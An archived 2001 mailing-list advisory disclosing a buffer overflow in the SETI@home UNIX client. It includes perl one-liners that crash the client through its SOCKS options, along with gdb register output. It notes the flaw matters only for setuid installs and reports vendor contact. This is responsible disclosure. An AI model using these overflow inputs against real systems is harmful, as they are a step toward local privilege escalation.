Vulnerability in SETI@home

From: joetestaat_private
Date: Sun Dec 02 2001 - 15:15:44 PST

Next message: smackenz: "Can anyone verify a core dump on /sbin/mingetty"

Previous message: Przemyslaw Frasunek: "Re: exploiting wu-ftpd"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----

Vulnerability in SETI@home



    Overview

SETI@home (http://setiathome.berkeley.edu/) is a distributed project that
allows ordinary citizens participate in the search for extraterrestrial
intelligence using their computer's idle time.  A buffer overflow exists
in the UNIX client software.

NOTE:  this vulnerability is NOT exploitable in the default installation.



    Details

The "i386-pc-linux-gnu-gnulibc2.1" version of the setiathome client (and
possibly others) is vulnerable to buffer overflow.  Example:


# ./setiathome -version
SETI@home client.
Platform: i386-pc-linux-gnu-gnulibc2.1
Version: 3.03

...
...

# ./setiathome -socks_server `perl -e 'print "A" x 5604;'`
Segmentation fault
# ./setiathome -socks_user `perl -e 'print "A" x 5344;'`
Segmentation fault
# ./setiathome -socks_passwd `perl -e 'print "A" x 5280;'`
Segmentation fault
#

[root@seti /home/setiathome]# gdb setiathome
GNU gdb 5.0rh-5 Red Hat Linux 7.1
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(no debugging symbols found)...
(gdb) r -socks_server `perl -e 'print "A" x 5604;'`
Starting program: /home/setiathome/setiathome -socks_server `perl -e 'print "A" x 5604;'`

Program received signal SIGSEGV, Segmentation fault.
0x2ab4d409 in strcpy () from /lib/libc.so.6
(gdb) info registers
eax            0x0      0
ecx            0x40404040       1077952576
edx            0x41414141       1094795585
ebx            0xfefefeff       -16843009
esp            0x7fffe664       0x7fffe664
ebp            0x7fffe6bc       0x7fffe6bc
esi            0x7ffffe28       2147483176
edi            0x807bffd        134725629
eip            0x2ab4d409       0x2ab4d409
eflags         0x10246  66118
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
fctrl          0x37f    895
fstat          0x0      0
ftag           0xffff   65535
fiseg          0x0      0
fioff          0x0      0
foseg          0x0      0
fooff          0x0      0
fop            0x0      0



    Solution

The SETI@home UNIX client is not installed with a setuid bit by default.
If one was added to it -- perhaps to run it under a 'setiathome' account --
remove it immediately.



    Vendor Status

The project directory, Dr. Dave P. Anderson, was contacted via
<daveaat_private> on Monday, Nov 5th.  He promptly replied that
this problem will be fixed in the next release.




    - Joe Testa

e-mail:   joetestaat_private
web page: http://hogs.rit.edu/~joet/
AIM:      LordSpankatron



-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wl0EARECAB0FAjwKtmIWHGpvZXRlc3RhQGh1c2htYWlsLmNvbQAKCRA/wHT6vruBNGeO
AJ9lCce/+Xb91i7BzpWvEiGfnUmBTgCginYcBQJ1WcuQeBC/RDyELpNvKIQ=
=M4UW
-----END PGP SIGNATURE-----

Next message: smackenz: "Can anyone verify a core dump on /sbin/mingetty"
Previous message: Przemyslaw Frasunek: "Re: exploiting wu-ftpd"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Dec 02 2001 - 16:31:41 PST